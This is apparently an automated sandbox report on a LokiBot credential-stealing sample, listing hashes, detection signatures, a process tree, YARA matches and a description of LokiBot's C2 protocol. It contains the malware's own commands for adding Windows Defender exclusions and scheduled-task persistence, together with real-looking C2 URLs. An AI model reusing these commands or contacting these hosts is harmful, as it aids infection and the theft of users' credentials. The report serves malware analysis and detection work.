Edit tour

Windows Analysis Report
YvVDV4cbjy.exe

Overview

General Information

Sample name:	YvVDV4cbjy.exe renamed because original name is a hash value
Original sample name:	ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726.exe
Analysis ID:	1588964
MD5:	de71da3a473f5cdb285d30a1d6dd333b
SHA1:	ebb3e9e7fe88c5ba0c24d0411f7a0c04c9e04181
SHA256:	ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726
Tags:	exeLokiuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

YvVDV4cbjy.exe (PID: 736 cmdline: "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)

powershell.exe (PID: 5768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

YvVDV4cbjy.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)

HxQXdrrQ.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe MD5: DE71DA3A473F5CDB285D30A1D6DD333B)

schtasks.exe (PID: 2940 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HxQXdrrQ.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)

HxQXdrrQ.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17af8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ec3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13707:$des3: 68 03 66 00 00 0x17af8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17bc4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ad8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ea3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x136e7:$des3: 68 03 66 00 00 0x17ad8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17ba4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175e0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x49ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131ef:$des3: 68 03 66 00 00 0x175e0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x176ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x498b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131cf:$des3: 68 03 66 00 00 0x175c0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1768c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x99a48:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x86dfb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x9563f:$des3: 68 03 66 00 00 0x99a48:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x99b14:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x9a6b8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x87a6b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x962af:$des3: 68 03 66 00 00 0x9a6b8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x9a784:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: YvVDV4cbjy.exe PID: 736	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: YvVDV4cbjy.exe PID: 736	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: YvVDV4cbjy.exe PID: 736	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: YvVDV4cbjy.exe PID: 736	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18e98:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xb6df6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xddd75:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: YvVDV4cbjy.exe PID: 6584	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 1632	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 1632	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 1632	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 1632	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1da8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1346f:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1ea04:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: HxQXdrrQ.exe PID: 7096	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 7096	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: HxQXdrrQ.exe PID: 7096	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3b6e:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 52 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.YvVDV4cbjy.exe.402e1f0.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.YvVDV4cbjy.exe.402e1f0.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.YvVDV4cbjy.exe.402e1f0.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.YvVDV4cbjy.exe.402e1f0.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.YvVDV4cbjy.exe.402e1f0.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.HxQXdrrQ.exe.394e708.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.HxQXdrrQ.exe.394e708.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.HxQXdrrQ.exe.394e708.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.HxQXdrrQ.exe.394e708.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
10.2.HxQXdrrQ.exe.394e708.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.HxQXdrrQ.exe.39346e8.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.HxQXdrrQ.exe.39346e8.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.HxQXdrrQ.exe.39346e8.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.HxQXdrrQ.exe.39346e8.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
10.2.HxQXdrrQ.exe.39346e8.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.HxQXdrrQ.exe.394e708.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
